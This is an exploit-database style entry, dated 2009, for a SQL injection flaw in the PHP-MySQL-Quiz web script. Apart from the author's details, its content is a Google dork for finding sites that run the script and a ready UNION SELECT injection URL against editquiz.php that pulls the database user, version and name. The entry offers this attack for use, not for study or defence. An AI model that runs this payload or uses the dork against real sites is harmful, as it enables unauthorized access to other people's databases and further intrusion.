PHP-MySQL-Quiz - SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2009-12-30  
date_updated:   
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 10876.txt  

#    PHP-MySQL-Quiz SQL Injection Vulnerability

#
#    Author: Hussin X

#    Home :  www.iq-ty.com<http://www.iq-ty.com>

#    email:  darkangel_g85[at]Yahoo[DoT]com


##########################################################
#    HomE script : http://www.widgetmonkey.com/

#    Download    : http://www.getfreesofts.com/script_download.php?id=18744&id_1=881

#    DorK : inurl:quizinfo.php



Exploit:

http://www.site.com/Script/editquiz.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8--


IQ-SecuritY FoRuM